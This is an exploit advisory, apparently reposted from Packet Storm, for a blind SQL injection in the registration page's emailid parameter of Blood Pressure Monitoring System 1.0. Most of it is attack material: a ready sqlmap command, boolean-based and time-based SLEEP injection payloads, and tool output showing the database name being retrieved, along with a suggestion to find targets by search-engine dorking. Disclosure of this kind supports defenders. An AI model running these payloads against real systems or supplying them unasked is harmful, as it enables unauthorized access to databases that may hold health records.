Share
## https://sploitus.com/exploit?id=PACKETSTORM:181760
=============================================================================================================================================
| # Title : Blood Pressure Monitoring System 1.0 Blind Sql Injection injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_bp-monitoring-management-s.zip |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] use payload : E:\sqlmap>python sqlmap.py -u 127.0.0.1//bpmms/registration.php --method POST --data "submit=&emailid=if" -p emailid --risk 3 --level 3 --dbms mysql --batch --current-db
[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1
---
Parameter: emailid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: submit=&emailid=if' AND 9071=9071 AND 'xVZD'='xVZD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: submit=&emailid=if' AND (SELECT 2282 FROM (SELECT(SLEEP(5)))lwti) AND 'gxpM'='gxpM
---
[18:10:58] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.58, PHP 8.0.30
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:10:58] [INFO] fetching current database
[18:10:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:10:58] [INFO] retrieved: bpmmsdb
current database: 'bpmmsdb'
[18:11:00] [INFO] fetched data logged to text files under 'C:\Users\indoushka\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 18:11:00 /2024-09-20/
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================